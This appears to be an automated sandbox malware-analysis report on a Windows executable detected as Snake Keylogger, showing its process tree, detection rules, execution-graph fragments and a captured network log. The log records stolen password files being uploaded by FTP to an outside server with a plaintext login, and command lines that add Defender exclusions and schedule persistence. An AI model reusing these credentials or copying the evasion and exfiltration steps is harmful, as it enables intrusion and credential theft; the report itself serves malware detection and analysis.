                                              2024-11-06 16:03:01 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Nov 6, 2024 17:03:03.548172951 CET215009450.31.176.103192.168.2.6220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                              Nov 6, 2024 17:03:03.551290035 CET5009421192.168.2.650.31.176.103USER somac@gdmaduanas.com
                                              Nov 6, 2024 17:03:03.701250076 CET215009450.31.176.103192.168.2.6331 User somac@gdmaduanas.com OK. Password required
                                              Nov 6, 2024 17:03:03.709415913 CET5009421192.168.2.650.31.176.103PASS HW=f09RQ-BL1
                                              Nov 6, 2024 17:03:03.994502068 CET215009450.31.176.103192.168.2.6230 OK. Current restricted directory is /
                                              Nov 6, 2024 17:03:04.144268036 CET215009450.31.176.103192.168.2.6504 Unknown command
                                              Nov 6, 2024 17:03:04.144442081 CET5009421192.168.2.650.31.176.103PWD
                                              Nov 6, 2024 17:03:04.294661045 CET215009450.31.176.103192.168.2.6257 "/" is your current location
                                              Nov 6, 2024 17:03:04.298115015 CET5009421192.168.2.650.31.176.103TYPE I
                                              Nov 6, 2024 17:03:04.448101044 CET215009450.31.176.103192.168.2.6200 TYPE is now 8-bit binary
                                              Nov 6, 2024 17:03:04.448419094 CET5009421192.168.2.650.31.176.103PASV
                                              Nov 6, 2024 17:03:04.598160028 CET215009450.31.176.103192.168.2.6227 Entering Passive Mode (50,31,176,103,132,236)
                                              Nov 6, 2024 17:03:04.603588104 CET5009421192.168.2.650.31.176.103STOR 358075 - Passwords ID - ZyiAEnXWZP344552897.txt
                                              Nov 6, 2024 17:03:05.132082939 CET215009450.31.176.103192.168.2.6150 Accepted data connection
                                              Nov 6, 2024 17:03:05.278944969 CET215009450.31.176.103192.168.2.6226-File successfully transferred
                                              226-File successfully transferred226 0.148 seconds (measured here), 2.35 Kbytes per second
                                              Nov 6, 2024 17:03:08.277299881 CET215011450.31.176.103192.168.2.6220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 500 allowed.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 500 allowed.220-Local time is now 11:03. Server port: 21.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                              Nov 6, 2024 17:03:08.277585030 CET5011421192.168.2.650.31.176.103USER somac@gdmaduanas.com
                                              Nov 6, 2024 17:03:08.422110081 CET215011450.31.176.103192.168.2.6331 User somac@gdmaduanas.com OK. Password required
                                              Nov 6, 2024 17:03:08.422483921 CET5011421192.168.2.650.31.176.103PASS HW=f09RQ-BL1
                                              Nov 6, 2024 17:03:08.595705986 CET215011450.31.176.103192.168.2.6230 OK. Current restricted directory is /
                                              Nov 6, 2024 17:03:08.742561102 CET215011450.31.176.103192.168.2.6504 Unknown command
                                              Nov 6, 2024 17:03:08.742691040 CET5011421192.168.2.650.31.176.103PWD
                                              Nov 6, 2024 17:03:08.888961077 CET215011450.31.176.103192.168.2.6257 "/" is your current location
                                              Nov 6, 2024 17:03:08.889298916 CET5011421192.168.2.650.31.176.103TYPE I
                                              Nov 6, 2024 17:03:09.998716116 CET215011450.31.176.103192.168.2.6200 TYPE is now 8-bit binary
                                              Nov 6, 2024 17:03:09.999053955 CET215011450.31.176.103192.168.2.6200 TYPE is now 8-bit binary
                                              Nov 6, 2024 17:03:09.999305964 CET215011450.31.176.103192.168.2.6200 TYPE is now 8-bit binary
                                              Nov 6, 2024 17:03:09.999531031 CET215011450.31.176.103192.168.2.6200 TYPE is now 8-bit binary
                                              Nov 6, 2024 17:03:10.002104044 CET5011421192.168.2.650.31.176.103PASV
                                              Nov 6, 2024 17:03:10.148757935 CET215011450.31.176.103192.168.2.6227 Entering Passive Mode (50,31,176,103,125,33)
                                              Nov 6, 2024 17:03:10.189915895 CET5011421192.168.2.650.31.176.103STOR 358075 - Passwords ID - ZyiAEnXWZP907345695.txt
                                              Nov 6, 2024 17:03:10.489619017 CET5011421192.168.2.650.31.176.103STOR 358075 - Passwords ID - ZyiAEnXWZP907345695.txt
                                              Nov 6, 2024 17:03:10.510365963 CET215011450.31.176.103192.168.2.6227 Entering Passive Mode (50,31,176,103,125,33)
                                              Nov 6, 2024 17:03:11.020520926 CET215011450.31.176.103192.168.2.6150 Accepted data connection
                                              Nov 6, 2024 17:03:11.168550014 CET215011450.31.176.103192.168.2.6226-File successfully transferred
                                              226-File successfully transferred226 0.148 seconds (measured here), 2.35 Kbytes per second

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:11:02:38
                                              Start date:06/11/2024
                                              Path:C:\Users\user\Desktop\hesaphareketi-01.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\hesaphareketi-01.exe"
                                              Imagebase:0x480000
                                              File size:797'696 bytes
                                              MD5 hash:FB1DDD3D10CA671F437C6F2F3C9D6E57
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:11:02:39
                                              Start date:06/11/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
                                              Imagebase:0x330000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:11:02:39
                                              Start date:06/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:11:02:39
                                              Start date:06/11/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"
                                              Imagebase:0x330000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:11:02:39
                                              Start date:06/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:11:02:39
                                              Start date:06/11/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp"
                                              Imagebase:0x1d0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:11:02:39
                                              Start date:06/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:11:02:40
                                              Start date:06/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              Imagebase:0xa00000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4701100037.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4701100037.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              Target ID:10
                                              Start time:11:02:42
                                              Start date:06/11/2024
                                              Path:C:\Users\user\AppData\Roaming\WvaGpcFVX.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\WvaGpcFVX.exe
                                              Imagebase:0xa30000
                                              File size:797'696 bytes
                                              MD5 hash:FB1DDD3D10CA671F437C6F2F3C9D6E57
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 39%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:11
                                              Start time:11:02:43
                                              Start date:06/11/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff717f30000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:11:02:44
                                              Start date:06/11/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp"
                                              Imagebase:0x1d0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:13
                                              Start time:11:02:44
                                              Start date:06/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:15
                                              Start time:11:02:45
                                              Start date:06/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              Imagebase:0x230000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:16
                                              Start time:11:02:45
                                              Start date:06/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              Imagebase:0x930000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4701852091.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4701852091.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:8.1%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:46
                                                Total number of Limit Nodes:5
                                                execution_graph 19744 f4ad30 19748 f4ae28 19744->19748 19753 f4ae18 19744->19753 19745 f4ad3f 19749 f4ae5c 19748->19749 19750 f4ae39 19748->19750 19749->19745 19750->19749 19751 f4b060 GetModuleHandleW 19750->19751 19752 f4b08d 19751->19752 19752->19745 19757 f4ae1c 19753->19757 19754 f4ae5c 19754->19745 19755 f4b060 GetModuleHandleW 19756 f4b08d 19755->19756 19756->19745 19757->19754 19757->19755 19758 f4d710 DuplicateHandle 19759 f4d7a6 19758->19759 19760 7240f40 19761 7240f66 19760->19761 19762 72410cb 19760->19762 19761->19762 19765 72411c0 PostMessageW 19761->19765 19767 72411b9 19761->19767 19766 724122c 19765->19766 19766->19761 19768 72411c0 PostMessageW 19767->19768 19769 724122c 19768->19769 19769->19761 19770 f4d0c0 19771 f4d106 GetCurrentProcess 19770->19771 19773 f4d151 19771->19773 19774 f4d158 GetCurrentThread 19771->19774 19773->19774 19775 f4d195 GetCurrentProcess 19774->19775 19776 f4d18e 19774->19776 19777 f4d1cb 19775->19777 19776->19775 19778 f4d1f3 GetCurrentThreadId 19777->19778 19779 f4d224 19778->19779 19780 f44668 19781 f4467a 19780->19781 19782 f44686 19781->19782 19784 f44778 19781->19784 19785 f4477c 19784->19785 19789 f44888 19785->19789 19793 f44878 19785->19793 19790 f448af 19789->19790 19791 f4498c 19790->19791 19797 f444b0 19790->19797 19791->19791 19795 f4487c 19793->19795 19794 f4498c 19794->19794 19795->19794 19796 f444b0 CreateActCtxA 19795->19796 19796->19794 19798 f45918 CreateActCtxA 19797->19798 19800 f459db 19798->19800
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2291258617.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7240000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d71e3e3a22295691418fdbd669e119fa1a156774617f3b24bad874f96de48591
                                                • Instruction ID: ae82e26400132f4700adc27043cec37feb430522832e700b9f1c7c467570e3c8
                                                • Opcode Fuzzy Hash: d71e3e3a22295691418fdbd669e119fa1a156774617f3b24bad874f96de48591
                                                • Instruction Fuzzy Hash: BBE1B0B17112059FDB29DB66C450BAE7BF6FF88700F10446DE6469B3A5CB38E802CB52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2291258617.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7240000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1c4d59fe2303518e4daef799cfdf6e4ed8fca2f44fe5612e45106bf732fa465
                                                • Instruction ID: 9be4debbcc750c5d487837f655a5272e0cf05a35cf4e0d540d82d4162f31e5aa
                                                • Opcode Fuzzy Hash: b1c4d59fe2303518e4daef799cfdf6e4ed8fca2f44fe5612e45106bf732fa465
                                                • Instruction Fuzzy Hash: 6CB01280C7F1C08AC1276B3094304B09E7C0D0B004F1434C1CA993F0135442E06C911E

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00F4D13E
                                                • GetCurrentThread.KERNEL32 ref: 00F4D17B
                                                • GetCurrentProcess.KERNEL32 ref: 00F4D1B8
                                                • GetCurrentThreadId.KERNEL32 ref: 00F4D211
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 26b8b5b719e07ccdcbe0f630c4d2ce0bc5be401f1caa3644bf19646b5b9cf10b
                                                • Instruction ID: 2cc429e93b8393f5d9ef321a50d60c2526d4c1f8818be9bc260606172ca02b98
                                                • Opcode Fuzzy Hash: 26b8b5b719e07ccdcbe0f630c4d2ce0bc5be401f1caa3644bf19646b5b9cf10b
                                                • Instruction Fuzzy Hash: DE5164B0D0134ACFEB14DFA9D548B9EBFF1EF88314F248459E418A72A1C7749984CB65

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00F4D13E
                                                • GetCurrentThread.KERNEL32 ref: 00F4D17B
                                                • GetCurrentProcess.KERNEL32 ref: 00F4D1B8
                                                • GetCurrentThreadId.KERNEL32 ref: 00F4D211
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: d581ef299cf5c3281c9939ee3be081dd3408dbd672f60414cac13a96ea856f92
                                                • Instruction ID: fbcde9a666111f3ef8dee5f48d0cea66c50c48d0ef513a6d5f538efb710e7f28
                                                • Opcode Fuzzy Hash: d581ef299cf5c3281c9939ee3be081dd3408dbd672f60414cac13a96ea856f92
                                                • Instruction Fuzzy Hash: A45176B0D01309CFEB04CFAAD548B9EBBF1EF88314F208459E518A7360C7749984CB65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 44 f4ae28-f4ae37 45 f4ae63-f4ae67 44->45 46 f4ae39-f4ae46 call f4a14c 44->46 48 f4ae69-f4ae73 45->48 49 f4ae7b-f4aebc 45->49 51 f4ae5c 46->51 52 f4ae48 46->52 48->49 55 f4aebe-f4aec6 49->55 56 f4aec9-f4aed7 49->56 51->45 99 f4ae4e call f4b0c0 52->99 100 f4ae4e call f4b0b1 52->100 55->56 57 f4aed9-f4aede 56->57 58 f4aefb-f4aefd 56->58 60 f4aee0-f4aee7 call f4a158 57->60 61 f4aee9 57->61 63 f4af00-f4af07 58->63 59 f4ae54-f4ae56 59->51 62 f4af98-f4b058 59->62 65 f4aeeb-f4aef9 60->65 61->65 94 f4b060-f4b08b GetModuleHandleW 62->94 95 f4b05a-f4b05d 62->95 66 f4af14-f4af1b 63->66 67 f4af09-f4af11 63->67 65->63 69 f4af1d-f4af25 66->69 70 f4af28-f4af31 call f4a168 66->70 67->66 69->70 75 f4af33-f4af3b 70->75 76 f4af3e-f4af43 70->76 75->76 77 f4af45-f4af4c 76->77 78 f4af61-f4af65 76->78 77->78 80 f4af4e-f4af5e call f4a178 call f4a188 77->80 101 f4af68 call f4b3c0 78->101 102 f4af68 call f4b3b0 78->102 80->78 83 f4af6b-f4af6e 85 f4af70-f4af8e 83->85 86 f4af91-f4af97 83->86 85->86 96 f4b094-f4b0a8 94->96 97 f4b08d-f4b093 94->97 95->94 97->96 99->59 100->59 101->83 102->83
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00F4B07E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: 8R$8R
                                                • API String ID: 4139908857-4151275524
                                                • Opcode ID: d650e50071f1b2a10278415e9e387b6329d1df515b9033cf95018cc82d9928a9
                                                • Instruction ID: cbf6db757ca59be27b50ab107d374bc474c6d2bacb97008717f49d3cbec910b9
                                                • Opcode Fuzzy Hash: d650e50071f1b2a10278415e9e387b6329d1df515b9033cf95018cc82d9928a9
                                                • Instruction Fuzzy Hash: 63812370A00B058FD724DF2AD45179ABBF1FF88314F008A2DE89ADBA50D775E849CB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 136 f45a84-f45b14
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff7cc06ef08995accd82af11e06e2643ce0fc6e2cab65dcc8cd950d828765618
                                                • Instruction ID: 060a685bbfc10bcb5c1ea9ac8493b6c6af1a200c088bf0a7cf59bb3568c5c208
                                                • Opcode Fuzzy Hash: ff7cc06ef08995accd82af11e06e2643ce0fc6e2cab65dcc8cd950d828765618
                                                • Instruction Fuzzy Hash: 3541EF71C04B49CFDB11DFA8C8447EDBFB0EF56B24F24828AC845AB252D739994ADB01

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 138 f4590c-f4590e 139 f45910 138->139 140 f45912 138->140 139->140 141 f45914 140->141 142 f45916-f4598c 140->142 141->142 144 f4598f-f459d9 CreateActCtxA 142->144 146 f459e2-f45a3c 144->146 147 f459db-f459e1 144->147 154 f45a3e-f45a41 146->154 155 f45a4b-f45a4f 146->155 147->146 154->155 156 f45a60 155->156 157 f45a51-f45a5d 155->157 159 f45a61 156->159 157->156 159->159
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00F459C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 8e43b3fbb460a75f1da1ee4dc4a39fe8c5b16331287aceceb9e2f23d340420ae
                                                • Instruction ID: 01b3dbf34d51bd169154c1defed29bcd9db0eafed506bd4f2020f51a9c37ab28
                                                • Opcode Fuzzy Hash: 8e43b3fbb460a75f1da1ee4dc4a39fe8c5b16331287aceceb9e2f23d340420ae
                                                • Instruction Fuzzy Hash: B841D3B0C0071DCBDB14DFA9C8847DEBBB5BF89714F20816AD808AB251DB755945CF51

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
